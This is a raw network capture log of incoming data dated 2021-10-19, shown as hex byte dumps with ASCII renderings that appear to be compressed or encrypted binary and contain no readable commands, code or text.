                                                                                                                                                                                2021-10-19 05:23:31 UTC157INData Raw: a3 60 67 83 97 67 7b 87 1c 11 e3 c1 bc 7a 09 5f 62 34 fe 03 fa b0 92 b8 66 37 51 b5 48 19 21 e8 16 0c 00 6e 6c ac df 5f 4f 04 c8 3e 9f 68 c4 0c d8 ba c9 d2 f2 96 9d d3 79 52 48 d1 1f 29 a0 a6 34 a7 6f 6c b4 58 4d 46 38 ba 4b e8 42 9b 42 17 91 70 19 a7 3e 62 0a 77 7a 40 66 9d a3 fb 09 5f b0 28 2e bc c9 e4 db 5e 44 d3 c7 49 e3 30 67 9a 65 c0 9d 52 4a 25 c4 05 5f b7 1d 23 29 93 a0 7e c5 70 d5 67 83 78 ef 1f a1 e2 ef 4e 11 70 2e 76 ae a7 7a f1 e0 35 26 a7 32 85 7b a7 87 fd 66 4a f3 96 bd e9 a1 7a 3d d3 1c 62 32 9e cf 51 13 42 43 6b 31 b6 7d 4b 01 40 27 c1 81 4d 12 cf 1b 25 2c 07 a0 b3 f9 aa 88 aa 59 d6 b5 f3 7b 06 3b fd d3 ed 79 81 72 c4 2c e0 a7 af 1f 06 b6 15 51 ce e0 a7 a6 9b 5f 73 9c 58 86 0e b5 09 37 fe d3 d8 0c c4 a3 97 30 6a b0 0a f2 86 4d 64 de 2d dc
                                                                                                                                                                                Data Ascii: `gg{z_b4f7QH!nl_O>hyRH)4olXMF8KBBp>bwz@f_(.^DI0geRJ%_#)~pgxNp.vz5&2{fJz=b2QBCk1}K@'M%,Y{;yr,Q_sX70jMd-
                                                                                                                                                                                2021-10-19 05:23:31 UTC161INData Raw: cb 85 d2 e2 ed 01 db 10 59 57 82 59 92 5a e3 a5 78 8f 1b a4 a5 4d 88 a1 80 83 ab 2b 76 92 5e b9 69 df e6 dc 22 a5 5b a1 2e 21 f2 3c 69 c4 01 6d aa c0 1c ee 13 5c 12 ca 82 f4 1f be 47 fc a2 b7 d7 58 34 a6 aa 71 3a 8f c2 83 75 7d 25 2c 3e 4f e0 40 f9 5d 89 98 d7 93 52 b2 44 2d 1a 91 6a 09 b7 e4 58 0b 0c a5 45 af 43 4f 18 da 7a d0 73 fd 31 81 73 f9 41 52 01 fd 1b c1 0b c7 ea 95 fa 7f 65 38 fb 75 34 b5 57 8f 5d 85 7e 41 e4 6f d1 a4 66 d7 32 9a 38 9f e5 3b 4c dd 10 1f 43 56 67 81 c0 24 ba ee 3c 98 7d d3 80 dc df 75 df 10 2e 16 6b d6 e6 45 57 bd c3 bb 3a 43 20 34 8d 2c 68 91 4f 89 25 32 03 7c 12 2f a7 79 de 88 55 5b b4 bf 01 0f 51 3b 9a d9 8c 29 a9 b3 de be c3 15 09 50 e5 5b 58 22 5f c6 22 aa d7 43 87 8c 03 49 5f 30 5f 22 ea 1f c7 d1 9c e8 eb 77 2a 7a b1 d7 23
                                                                                                                                                                                Data Ascii: YWYZxM+v^i"[.!<im\GX4q:u}%,>O@]RD-jXECOzs1sARe8u4W]~Aof28;LCVg$<}u.kEW:C 4,hO%2|/yU[Q;)P[X"_"CI_0_"w*z#
                                                                                                                                                                                2021-10-19 05:23:31 UTC165INData Raw: a6 85 78 a2 03 35 c7 30 ff 01 56 8f 76 ce 2a 31 45 f6 81 71 c0 1a 61 73 7a a4 b4 26 0d 1d f6 d6 25 31 cf 55 73 24 53 a8 69 bf 90 cb 0c 8e ee 2d 81 d8 17 85 a6 65 8b bb be 96 69 51 23 4f 68 19 0e cb 8b 86 2e 7d c6 40 be bf 7d 67 77 03 34 fd bc 65 75 fa 5b 55 37 d7 fa fe 94 b5 42 25 87 e8 1c 76 6c a0 82 62 1c 9f 25 17 f4 28 5e a4 d3 8a 91 34 52 72 c1 36 25 c2 84 40 77 d0 ae f8 23 36 3e ba 87 9f 92 64 85 98 06 21 c0 9e 67 c3 eb fa 61 76 da c5 6e f2 f0 23 4b d0 ab 79 9a 52 87 22 76 2e d1 2e 65 16 3c 79 46 72 67 28 76 82 3b 24 a7 f2 9f 6c da b9 a9 62 91 62 36 7d 2a ca 65 92 88 f7 5b 2d 07 b0 6e 22 2f bc 8a 0b 78 c6 65 f5 01 3f 2f 95 52 cc 8d 14 ae 8f d5 68 0d e8 f9 de c0 50 27 0a 29 8d 38 9b aa 65 48 1b d2 29 37 66 f9 5d 7a 86 2d 19 07 56 78 0b ab ca 84 9f 06
                                                                                                                                                                                Data Ascii: x50Vv*1Eqasz&%1Us$Si-eiQ#Oh.}@}gw4eu[U7B%vlb%(^4Rr6%@w#6>d!gavn#KyR"v..e<yFrg(v;$lbb6}*e[-n"/xe?/RhP')8eH)7f]z-Vx
                                                                                                                                                                                2021-10-19 05:23:31 UTC169INData Raw: 85 b9 13 83 0c 09 ec f2 7d 97 b4 5e 13 b5 5d b3 a5 ef af 2d 92 dc 60 23 71 d4 ea 23 ce ba e6 ec 89 2f 86 59 65 7a 88 05 17 06 fd 0e 89 e5 86 0e a0 6f 98 3c 06 fd 00 a6 22 30 1a b7 41 d3 61 a1 eb 22 fc c8 af 5a 53 06 57 ff 85 5c 8a 8a 11 9a de 2b 36 e9 81 bf 8c c9 12 5c 90 ed f7 34 1f c2 a7 22 29 f0 c3 e1 e2 e5 1e f1 43 34 67 84 31 bf 41 bd 1a 8a ad 93 a8 dc e1 d7 e7 31 03 cf 22 d1 2f 18 1e 1c ff d2 6f d9 5f 91 78 32 72 22 22 c7 fb c3 6b fa 57 fc 99 2f d0 af 37 0e 82 b7 15 c4 54 19 48 df 33 ce 41 2a 80 1b b1 71 1a 7f 4a 6c 8e ad 23 ce 8b e4 3f 02 71 75 fa 5c 65 89 4f 91 58 2f 69 59 6a 42 60 b7 da bc c4 cd e3 1c e7 1d 5a 3a ec 58 2a b7 f5 83 6b 73 f6 9a 44 21 36 75 ae 95 e3 ed 8c 26 c6 57 fb 4a 6a 3e b0 40 20 a3 d2 7a 6b 8c 65 18 57 da 80 26 72 6e df 3a 71
                                                                                                                                                                                Data Ascii: }^]-`#q#/Yezo<"0Aa"ZSW\+6\4")C4g1A1"/o_x2r""kW/7TH3A*qJl#?qu\eOX/iYjB`Z:X*ksD!6u&WJj>@ zkeW&rn:q
                                                                                                                                                                                2021-10-19 05:23:31 UTC172INData Raw: 39 c9 d0 fc 2e 7f de a4 08 7f dd 7d 76 92 61 89 6d 24 a9 b4 2f b0 14 5c b5 d2 9e 96 be 65 c8 4a 5c b6 2d 8c e0 f8 a7 be 91 83 22 ff 7d 1d bd 1f 08 46 28 67 22 68 8f 8b 20 b6 52 8c f5 86 15 eb 13 27 42 e1 9b 7d 4d 1c c6 55 a6 a9 cb e7 7c 72 cc f5 c4 a0 60 29 2d b2 ba c4 98 41 d9 6f 2a fb 21 4f db 66 c1 ea 39 1c 70 59 31 7c a8 a1 db 71 90 a3 9e da 8e 1a 0e 6d ab 00 be 13 43 10 f5 ea 5a 06 45 65 49 33 d4 6e 3e 54 88 1c 48 72 ee db f0 3f d9 ef 6a 07 58 a3 5e f8 c3 4e 0e 60 13 08 06 38 e7 7a dc d7 06 6e 46 13 78 8f 7c 4c 9a 30 4f 4e 41 1d 7b 6d d9 9e 20 96 63 63 7a 17 01 99 5b 10 d8 cb 4a c4 00 9b 58 62 ba 16 25 97 70 d1 ff a9 2c 77 92 ec e5 2b ab c6 a1 73 a0 aa 5b 9c ec 9d 5a 5d d7 cb 13 30 e0 59 ee 81 e5 16 21 4d 73 19 92 c4 f9 84 3e da 20 d3 0a f3 1e e6 7a
                                                                                                                                                                                Data Ascii: 9.}vam$/\eJ\-"}F(g"h R'B}MU|r`)-Ao*!Of9pY1|qmCZEeI3n>THr?jX^N`8znFx|L0ONA{m ccz[JXb%p,w+s[Z]0Y!Ms> z
                                                                                                                                                                                2021-10-19 05:23:31 UTC176INData Raw: 95 49 3a 31 a8 80 f3 91 f5 60 97 2c aa 65 47 63 4a f6 bc 94 64 c0 2c 15 be cd 6b 03 80 42 eb 56 69 26 f9 a9 26 f5 5c 82 e3 15 d6 a4 2a c9 2d 47 4c c4 a8 7b 43 02 6a b9 7e 47 7a cf 3c 29 76 67 25 c9 85 99 6c f8 cc 5e a0 30 22 c8 2d df 28 74 6b aa 6f 1f 67 bf d4 95 45 2a b6 71 8e c4 b3 e2 3f de 8f 55 fd 32 0b 7c 06 98 e6 24 66 e0 04 d1 60 4e 80 67 d4 a6 3b 2b 82 72 98 b7 bd 42 5f ec d2 87 c1 9f 1e d6 f7 72 45 af 39 5f b0 78 f6 61 7d a8 80 8f 62 f8 05 42 4c ab 0a 04 73 09 a1 5f d4 27 f8 90 33 ce 1d d6 e3 67 5b 09 dd 3e 87 3e 36 59 3b 24 97 08 21 af 50 ab 0f 78 d3 d4 1a a4 68 ad e4 4e 57 5d 69 0b 16 2b b7 1a c8 38 50 26 d2 3f 1f bb ab 06 9f 1f 96 4d 03 b1 33 f5 f8 0c 21 4a e6 ca 97 dc 58 08 8f 00 e8 76 9f b8 3e 5a a6 fd d1 80 2c 76 35 43 9f b4 ba 3e bb 4b 5a
                                                                                                                                                                                Data Ascii: I:1`,eGcJd,kBVi&&\*-GL{Cj~Gz<)vg%l^0"-(tkogE*q?U2|$f`Ng;+rB_rE9_xa}bBLs_'3g[>>6Y;$!PxhNW]i+8P&?M3!JXv>Z,v5C>KZ
                                                                                                                                                                                2021-10-19 05:23:31 UTC180INData Raw: 06 60 4f c3 58 a9 76 6e 5a 14 11 63 1d 17 a6 6d a8 1d 8a 82 31 7b 50 1d 60 5b ca 70 7c f0 e7 3a 67 2a 5f 51 df 87 e0 33 42 21 27 c0 74 f0 bf bb 98 45 12 17 2c 92 65 6f 12 f4 6c fd 5b 30 55 72 be 05 73 a0 29 63 3e 98 0d 85 26 7c 34 df fe 87 4c 5a 28 d1 1b 19 dd 3b 8d 73 da b1 91 67 5a eb 26 1c d8 98 8c 22 1d 95 3e f1 e7 43 fc e4 fd e2 e6 66 e7 19 f8 67 1a 84 dd 05 d7 95 b3 30 81 46 1c f1 c0 9d 03 ff a1 64 42 09 90 69 cf fa 91 4a be e8 0a 2f c2 8b b6 d5 63 f0 f5 10 ea c8 ac e2 e5 e8 af 93 32 3e fc 29 ec 15 f8 08 c3 74 05 b2 77 17 02 27 a1 26 aa ac a7 5d 1c 05 3c ea 0b 75 06 10 0c 47 43 8d 64 9c 22 82 1a 1b 5e 84 38 bf 5a 0a d6 e7 06 24 85 d9 32 43 8c 61 0c 16 8c 6e ce e9 90 e5 a2 b1 05 98 dd 58 15 0b 7e 45 41 6c d6 8c 0c 13 dd 36 c6 f9 be 83 42 a7 58 1d 4f
                                                                                                                                                                                Data Ascii: `OXvnZcm1{P`[p|:g*_Q3B!'tE,eol[0Urs)c>&|4LZ(;sgZ&">Cfg0FdBiJ/c2>)tw'&]<uGCd"^8Z$2CanX~EAl6BXO
                                                                                                                                                                                2021-10-19 05:23:31 UTC184INData Raw: 3d 90 c1 4c b4 42 87 27 b2 96 4e ed 74 7a 68 b7 7a 17 1f 5d 8f 16 93 0c 79 be 8b ac 74 37 ea 1b 56 2c 1e 9a 57 0b 0d 82 6d 1f 06 f7 ea ab 29 c2 01 27 70 20 50 d2 a3 59 a7 c7 79 4b 3f e4 61 34 5b f8 48 eb ac af 03 f6 f6 f2 ff ad 1b 1e 00 4c 2a 2c 80 32 da bd 0e 8b 5f 31 52 2b 22 91 5d fb 48 f7 26 36 03 5e a2 0f 60 a8 6a 32 f9 37 e6 a9 51 27 ed af 67 a0 d2 d7 3e 0b 44 9b 68 9c f0 a3 5f 5c 67 dc 04 0c 43 57 8b 23 1e 19 70 24 70 41 76 1e d2 d4 62 16 b5 5b 4a 32 20 32 bc ca 23 fe 01 f4 9b 29 7b 80 ec ea 2d ca 1b 2d db b9 7c 3a 97 61 d1 f1 9d a4 2f 19 87 3b ef ac 53 94 0d 6e 59 17 ad a6 a1 f1 6f 44 11 ed 95 72 ff f0 eb 1a 69 d9 42 08 49 b9 53 ba 48 28 61 ca 5d 37 09 51 3d 14 93 b0 bc bc 92 9c f2 17 d2 43 44 65 fb 40 f1 71 81 e1 17 e8 f0 4a 67 96 35 48 fe 4f 93
                                                                                                                                                                                Data Ascii: =LB'Ntzhz]yt7V,Wm)'p PYyK?a4[HL*,2_1R+"]H&6^`j27Q'g>Dh_\gCW#p$pAvb[J2 2#){--|:a/;SnYoDriBISH(a]7Q=CDe@qJg5HO
                                                                                                                                                                                2021-10-19 05:23:31 UTC189INData Raw: 58 a8 1b 8b 89 a4 28 2e ae a8 b4 35 0a 16 a0 9b 14 61 54 0d 77 2d 62 af 2b 1e 86 d3 c2 96 db b3 17 8d 9f d8 71 c8 49 58 ca c3 25 f9 05 79 17 b0 47 a8 eb 4f ca 21 f7 e7 c3 d2 97 8d 6c 5c 61 c5 b0 a5 f4 c2 da fd 57 17 fd ee 5a 9c c5 03 26 36 3c ea 17 24 9a 26 b0 e5 37 d2 78 de bb 87 4c 58 82 d7 32 4a 71 be 24 73 ca 6a 59 d1 01 b8 40 dc e0 f7 c6 ec 2e 31 79 be ac 3f 51 e6 22 cb 82 5f 79 22 32 71 0e 35 90 81 c8 7a 2d 5f 9a cc 9e dc 9b 32 e9 d0 c6 66 de 9e 38 e7 2e 6f d5 6d af 78 3b 96 63 f1 8d 5a 92 a9 43 45 e8 fb 67 46 0d 03 18 02 bc 22 23 96 8c d1 1d 56 e7 74 d5 7d 94 6a 5c bd 3a 40 3e 73 87 a4 2d 3a 5b 6b 61 64 e8 d2 ed 96 f9 40 d2 91 92 06 a9 f9 ee cb 3c d2 f7 cb a4 81 5c 9a 67 df 80 8a c1 22 ac ed f9 01 b7 27 3d a4 2c a2 93 09 20 41 70 d4 13 a1 79 82 c3
                                                                                                                                                                                Data Ascii: X(.5aTw-b+qIX%yGO!l\aWZ&6<$&7xLX2Jq$sjY@.1y?Q"_y"2q5z-_2f8.omx;cZCEgF"#Vt}j\:@>s-:[kad@<\g"'=, Apy
                                                                                                                                                                                2021-10-19 05:23:31 UTC193INData Raw: 23 9f d8 01 09 cf 84 2f 59 5f 71 08 66 5c db 96 63 41 07 79 b4 11 1f 22 26 3e 71 63 9a 92 19 7b 5d 18 b2 1b 2a 49 2b 6b 14 99 a5 a4 42 1d 58 1b 6f 57 62 08 ea 7c a0 af 38 b3 83 27 01 b9 19 3b 25 f8 4b 9a bf 0c 8e 6c 87 2a 63 1a ee df a4 b7 25 bf 79 7c ba dc 07 24 c4 5b 73 c6 67 8b a9 94 67 34 44 d0 6d dc 11 c6 0c be 24 01 1d 9a ea 73 67 95 83 c4 ac d9 2e b9 99 43 8b bf d7 a4 ff 5c ec 8b 5b 91 53 7b de 14 9d d9 5a b4 5f 57 52 08 43 de a4 c2 56 d6 87 9d e2 ff b3 52 9f cd 2b 23 d1 e2 b0 90 39 92 d3 96 76 0a 98 71 d1 32 a2 66 86 aa 0e e2 3d 98 ba 24 3a 64 88 ee 70 38 9b 8e e1 e8 9b a1 87 61 0f 57 bd d2 45 f9 be 21 de 59 34 bc c4 4f 8b 2c 14 47 75 7c 1b 40 68 a7 ed 74 73 38 81 9f 7d d1 d4 87 c0 32 93 cb cd c7 4a d8 80 e2 87 de f7 a0 ea f7 2c 5f cd 52 06 bf 56
                                                                                                                                                                                Data Ascii: #/Y_qf\cAy"&>qc{]*I+kBXoWb|8';%Kl*c%y|$[sgg4Dm$sg.C\[S{Z_WRCVR+#9vq2f=$:dp8aWE!Y4O,Gu|@hts8}2J,_RV
                                                                                                                                                                                2021-10-19 05:23:31 UTC197INData Raw: e3 41 73 01 bc 47 6d 1a d6 63 6a f9 31 e9 34 14 fa 49 59 f8 7d 8b c0 e7 21 76 52 97 fc 0f 64 c7 5c c5 0f 8e 3d 59 9a ca e3 28 dd 99 fb 08 a8 83 70 d5 88 24 1e e1 3b 9d 2f 30 04 97 31 82 c1 78 9d 50 23 f1 52 76 b7 14 18 06 11 0e 99 06 d2 cd 4b 8a 49 18 c3 b5 ea 66 94 0e 0e 84 92 d9 6a fa 73 3a a3 32 e1 34 0a a2 23 02 2c e1 65 27 61 1f d5 7b d3 f9 1f 7e e5 11 57 76 96 3b aa ed 31 75 c5 7d 30 69 2d 9e 18 5c 1b 7f 55 6f 89 33 01 10 de 9c 89 9d 62 33 02 57 28 72 79 05 4f 0c 8c d1 54 42 8b 67 c8 3d ac 38 9e db 47 85 c1 8e 63 25 d4 0d 0a 85 79 30 f2 f8 d6 c2 22 d6 d5 e2 bf 1d 10 f8 27 f0 88 06 90 ca e2 03 ee a7 4a 3b ce 4f aa 15 1b 5f 73 65 7d 91 ed 0f 8d cb bf 74 71 a4 97 e3 b5 75 cc 75 cb 35 ae 71 ae 36 9d dc d6 7d e2 88 10 0a 5c 6a c7 e7 2b 0a 88 d7 ce 51 3a
                                                                                                                                                                                Data Ascii: AsGmcj14IY}!vRd\=Y(p$;/01xP#RvKIfjs:24#,e'a{~Wv;1u}0i-\Uo3b3W(ryOTBg=8Gc%y0"'J;O_se}tquu5q6}\j+Q:
                                                                                                                                                                                2021-10-19 05:23:31 UTC201INData Raw: 9d c9 29 3c ae de ee f4 6c 32 37 7d 9f 45 51 7a 84 ba 9d 86 04 eb 3e 6e 2b 07 80 79 85 68 16 7b 3b 0a fd 5b 3c 01 d8 cd 58 09 07 e1 94 7f 0e a2 3e a7 0e 0e 3f 51 5f 1f 4b 67 79 9d 43 13 70 4d e5 bb 1d 87 36 3b e8 23 78 76 e8 91 62 3c 96 29 32 7d c6 9d 27 44 99 ae 1f 45 e9 79 88 69 d1 b3 2c 05 70 31 ad f9 a2 5e 61 38 d3 c4 d8 27 ec c6 f1 50 7e 59 41 f0 96 94 47 bb 43 c4 a8 5d 08 8f ec 1a 32 c8 8c 5b 1f 7e ea 09 ab 25 5e bc 95 67 c2 b6 fb 9c ad 39 59 b2 d0 6b 95 03 f8 21 30 9f c3 33 70 54 75 2f 20 76 87 1d 50 c1 77 24 72 56 ee 23 43 f2 f0 f3 7d e4 2a de 55 23 b0 1c 54 5c 46 4b d3 34 6a a4 6f 29 81 24 64 2e 5a 56 2d 66 21 d8 7d 79 ca ea 19 32 8e 17 db 30 19 d0 d1 c1 04 50 fe 2b fd 24 02 24 b6 ff a3 df 52 12 ad 35 34 f6 1a 21 79 65 25 17 d8 71 e0 10 91 09 aa
                                                                                                                                                                                Data Ascii: )<l27}EQz>n+yh{;[<X>?Q_KgyCpM6;#xvb<)2}'DEyi,p1^a8'P~YAGC]2[~%^g9Yk!03pTu/ vPw$rV#C}*U#T\FK4jo)$d.ZV-f!}y20P+$$R54!ye%q
                                                                                                                                                                                2021-10-19 05:23:31 UTC204INData Raw: 4e 68 51 29 ba 9c 8a 4a 7a 65 02 2a 91 5d 42 e1 a4 a3 2b 7a 6f 30 df 0f 53 80 a5 15 48 60 f2 56 6b 1d 68 d2 cc fb 8a 5d 58 da 59 f9 61 ee 01 de 4f dc 9a 00 bc dd 4d 9d 50 46 d1 6d 50 6b 7a 71 2c 6a c4 57 13 dc c5 d1 0c a1 31 bc f0 f0 ac 19 db 28 7f 63 a6 24 7d 1a 06 75 c3 e4 e0 5a 93 94 e6 e2 82 b4 5f ba 6f 8b dc ad 02 2a 24 2e a9 e6 27 6c 4b f3 a9 99 f4 b0 11 6a 51 d5 80 ea 90 55 2a 22 75 6d a4 28 6d 98 ca 82 fa a5 af da ef ff 58 2d bc 81 17 bd ae e4 01 e7 94 32 4e 3d 32 db c5 50 ce a6 89 fc 32 09 4a b3 c7 34 85 bb 6c 3e 14 e1 4a 54 15 cd 85 74 cd 5a 85 1b f9 f1 54 5a c0 8e 02 54 50 65 a7 39 f2 74 1f 33 e8 30 8e c7 7f a9 b7 9a 5c 33 92 5d b0 94 2d 91 1f 3b aa 3d 6c 19 f5 70 52 a4 89 7a 3c 97 23 f1 fb 6c 2a 24 e3 b0 f3 38 1c 31 10 92 b7 e2 c0 65 32 94 c6
                                                                                                                                                                                Data Ascii: NhQ)Jze*]B+zo0SH`Vkh]XYaOMPFmPkzq,jW1(c$}uZ_o*$.'lKjQU*"um(mX-2N=2P2J4l>JTtZTZTPe9t30\3]-;=lpRz<#l*$81e2
                                                                                                                                                                                2021-10-19 05:23:31 UTC208INData Raw: 20 3b 6a db 88 3c 66 1f cf 4b 82 11 e6 4a 1a b0 39 16 22 93 63 41 1d bc b8 d8 87 95 6e 51 6c 02 94 41 6f 02 85 33 ad 27 90 41 f9 14 fd 2b ec 30 5c 64 5f 5c 36 21 94 81 3a 3c 8f 7b 23 62 52 18 32 a2 1f a6 ed 30 da 02 17 39 81 02 75 2c 5f d0 85 29 e1 b4 8f 41 0d 03 27 67 0f bc 8f 41 81 04 ab ed 02 2d a2 57 57 7d a2 40 6a 74 23 c1 25 d1 cd f4 d6 a5 75 32 ed e1 8f 5c cd f2 b2 7b 17 90 de 37 6b 93 6c d5 58 6e 7b 2f b1 50 e1 57 52 ce 0f 12 09 7e b4 62 0d 8d 28 68 ae 30 6c 22 4c f5 2d 31 bc cc 0f 1a 2d 7b 23 77 ff 61 f9 90 06 97 a4 2b 89 a2 60 f3 09 0f 3a f7 ba 7c a5 c0 84 ef c8 86 67 01 85 b6 10 c4 a7 7b 44 da ef 5a 63 70 a5 cc 6f 27 79 46 58 2f 6c c0 f5 b9 8c e2 76 04 6a 91 68 1b 3f c1 c1 13 70 9b 07 8f 18 a5 1b 61 d7 1a 38 6a 09 99 f1 60 93 f3 a9 8d 65 a0 ad
                                                                                                                                                                                Data Ascii: ;j<fKJ9"cAnQlAo3'A+0\d_\6!:<{#bR209u,_)A'gA-WW}@jt#%u2\{7klXn{/PWR~b(h0l"L-1-{#wa+`:|g{DZcpo'yFX/lvjh?pa8j`e
                                                                                                                                                                                2021-10-19 05:23:31 UTC212INData Raw: e1 0c 7c 9c 56 82 22 74 de ac f4 d1 2d 53 cb 51 23 60 19 67 a3 b3 d0 2d 5c 62 9b 1c c7 6d 31 75 2a 8b c4 9e 80 47 02 70 e5 b7 4a 8d 6c 54 a2 d1 52 36 d7 c0 7d 57 21 66 61 ea 0f 6c 5f 1c 62 12 61 43 18 70 59 57 0e 18 9b 58 06 37 26 4a d5 b6 e6 7f 91 1f 1e 6a 51 6c 54 ff 05 68 54 5f b2 5f 24 8f ad c5 37 76 90 d8 8b b2 18 ce 8d a6 63 78 f1 64 8b 8d cd db bb b3 f5 2a 1d 80 1e a2 a9 51 47 35 a5 26 57 80 bb 69 8f 2b 9b d9 47 30 bd 19 f9 71 20 15 3e 99 bd 63 6f 9e a9 31 13 98 77 b6 eb 51 3a 6a 22 33 38 b3 85 0f 78 e1 6d e6 95 06 50 e5 b8 fb bc 7f 12 f6 5f e3 1b 0a 50 e3 22 d0 3b 43 14 4b d1 ff 75 62 52 db 3a 7b 90 29 57 94 29 1a fc 7a d4 75 9f 94 3f 73 ba 93 41 53 4d 1c 99 8b 1c c3 de bc 05 25 9f 9a e3 b9 5b 67 22 71 5b 75 97 67 c3 b2 dd c5 4d e4 29 72 e9 5e 0e
                                                                                                                                                                                Data Ascii: |V"t-SQ#`g-\bm1u*GpJlTR6}W!fal_baCpYWX7&JjQlThT__$7vcxd*QG5&Wi+G0q >co1wQ:j"38xmP_P";CKubR:{)W)zu?sASM%[g"q[ugM)r^
                                                                                                                                                                                2021-10-19 05:23:31 UTC228INData Raw: 5a 87 44 5d 49 5f 17 5f ff 7f 8c 2e 29 3e 20 60 63 08 b4 58 81 48 3b 75 35 fd 13 cf 59 17 fd 65 3c 4d 8c b8 af b2 8e 75 6d bb 04 39 86 02 91 45 72 aa 14 6c 3b 6a 0c 6a 4e f5 38 62 f0 cf b6 a8 70 c2 bb f6 40 d7 be 83 c9 c0 64 9a 0b 8d 32 fd 23 67 03 a2 6f c7 4c e3 c0 8e 19 75 6d 0e 3d 0b 8e 06 d2 5b 44 4a 8f f5 5c 2f 93 2d ee 4d 01 5f 22 5e b4 c1 53 84 b0 fe 6b 4f 04 0c 39 68 f9 3d 9e ab 7f c8 04 97 41 85 74 24 40 df 01 d7 c5 3d 95 e7 74 0a 41 32 75 40 87 59 5e f6 29 f7 10 dd 7e d7 ec 3b 29 d6 b8 65 fe 5f 54 e9 e8 0c b0 88 05 d2 13 3e 50 4b aa 4d f6 28 7f 53 28 1f f7 35 81 3f 5f a2 e0 84 24 f1 05 ef 14 2d 01 07 e4 8e dd ef 5b ee 52 7f 21 05 5a df 2f 7a 3c 5d b4 1b a7 da db 88 5d 9b 83 8f 01 87 ab 88 71 59 a3 7e e1 56 5f 92 c6 da f9 85 6a ce ab 00 09 75 31
                                                                                                                                                                                Data Ascii: ZD]I__.)> `cXH;u5Ye<Mum9Erl;jjN8bp@d2#goLum=[DJ\/-M_"^SkO9h=At$@=tA2u@Y^)~;)e_T>PKM(S(5?_$-[R!Z/z<]]qY~V_ju1
                                                                                                                                                                                2021-10-19 05:23:31 UTC236INData Raw: 84 a6 89 56 f2 cd 4e 6a 24 62 e7 b7 10 05 d2 ca 64 9e 7f 81 32 c0 3b 8f d4 15 36 08 9c 4b c9 41 43 75 72 7f 08 59 d9 3d 81 7e 5b 6c 42 70 50 d9 74 2a 33 96 ac 46 46 d7 af f7 b9 1f ed 9d 29 ab 17 7e d3 66 13 15 55 4c 11 65 90 8d 2d 6c b1 8e 74 65 6d b5 14 3d 8e aa d9 61 44 88 af f5 bf 77 ee e1 50 53 04 ed 5c aa 98 2d 24 95 83 2a 45 be e3 a8 98 6c b7 f5 b3 d7 a3 2d fa ff 0d 5f e1 84 7c cd c9 4c 83 fd ef 68 2d 19 31 1a 25 ce 68 2e 39 de 89 52 82 e5 8c 1c a7 29 30 29 54 2a d5 ba e6 05 b6 f0 ac fd 75 17 5d f5 a8 ab ec 6f b3 a7 e0 0a 74 9c 7e 11 81 6a d4 f6 08 00 65 68 4f ef f5 2f de d8 23 15 86 5e 23 55 22 5e 35 59 3b dd d4 a5 53 8f 37 61 31 6a 53 67 46 2d 6c 53 15 5f e3 64 5a aa 1c 8f 2e c7 d3 80 59 07 4e 4a 69 8b 6c 3c ab ef 4b a5 b4 0b 42 a0 8d f6 18 62 46
                                                                                                                                                                                Data Ascii: VNj$bd2;6KACurY=~[lBpPt*3FF)~fULe-ltem=aDwPS\-$*El-_|Lh-1%h.9R)0)T*u]ot~jehO/#^#U"^5Y;S7a1jSgF-lS_dZ.YNJil<KBbF
                                                                                                                                                                                2021-10-19 05:23:31 UTC252INData Raw: 50 40 a2 87 43 66 d9 35 23 52 30 8d ad ed d8 8c 46 19 d6 26 0b fb af 5e 6f 10 45 a6 94 11 ee a6 77 70 29 9d 8d 66 8e 90 28 e5 e0 5a 11 b6 fd d7 3b d3 44 80 cb 04 8c 5e 07 69 9c 2e 1c 7e 42 df 1a 26 ba d2 c2 6d 30 87 b4 1d 52 da 77 8e 02 19 cf 40 7c 43 ac 76 72 52 b2 e8 0d 96 62 e4 59 87 ac 66 d9 0a fc 03 d1 85 84 18 56 ab b9 6d 12 9e d1 8d 13 22 23 bc c1 7e 08 fd a1 bf 77 86 f6 e6 d0 75 ca 69 37 dd 31 d0 b4 70 26 c6 ed 71 59 24 1d 63 8a 86 1f 96 c4 7d 2b 3a 38 22 08 2d 81 e5 0b de 3f 72 5f 25 a2 e2 6c 6d 8c a6 04 4f d1 22 24 54 86 76 bc e5 9f df 14 ea 3b 4e 24 f3 2e 44 bc db 49 04 ba 56 3b 5e 80 99 d1 d6 f3 a7 58 27 63 ce 2f b3 13 f6 85 5e 3b 1d 29 71 79 96 5b 66 4f 74 7c 87 1c 6d 8a 7a b7 6d 9a 29 13 57 c1 4c d2 8f ca e8 24 3b 10 66 4b bd ba be 82 6d 76
                                                                                                                                                                                Data Ascii: P@Cf5#R0F&^oEwp)f(Z;D^i.~B&m0Rw@|CvrRbYfVm"#~wui71p&qY$c}+:8"-?r_%lmO"$Tv;N$.DIV;^X'c/^;)qy[fOt|mzm)WL$;fKmv
                                                                                                                                                                                2021-10-19 05:23:31 UTC268INData Raw: 6e 62 2c 76 43 11 c9 3a 27 91 a1 8e 92 c9 75 52 71 dc 0d 8e db db d1 0e 6f 20 fc 86 8f ee 80 e6 73 e1 85 8f 71 de ac ac 83 75 5a 1f 27 ca c7 29 5d 6e 22 e7 e7 6d 93 1f 93 ed 29 d2 af 66 6a 1a a3 7e ad e8 23 1b 6d 5f 63 e8 c1 44 9b 4e 02 8e 6b a7 44 24 14 20 aa 08 d5 5e c3 26 23 4a c4 ea 93 05 0e 8e 01 6e 71 0b 04 07 0e 0e 02 6e 78 84 93 73 a6 31 15 e2 49 a8 b2 7d 79 6c 6b 03 ba 88 a3 be 1a 8f 13 f2 a6 62 83 1d dc a6 14 06 ee a1 6f 2f 32 66 83 ba ea 26 6c ed 09 a6 be 06 1a a6 13 a2 eb 65 c2 b2 99 21 99 b6 59 4a 26 2a 1a 4a 13 c6 7b 7d 11 5d 42 6a cb 50 8f 84 93 8d 2a 5e a4 82 ba ff 42 96 c2 8e 77 f0 63 be 23 ca 43 32 0b 0f ca 8f 23 ed 68 5e 4b 78 59 f2 7d e6 65 06 64 22 be ce 1c 0b 5a 5f 3e 1d fa df 13 de 03 ec 03 0d 54 66 8a 38 fa 8a 8b ee 5c f5 b3 e2 c4
                                                                                                                                                                                Data Ascii: nb,vC:'uRqo squZ')]n"m)fj~#m_cDNkD$ ^&#Jnqnxs1I}ylkbo/2f&le!YJ&*J{}]BjP*^Bwc#C2#h^KxY}ed"Z_>Tf8\
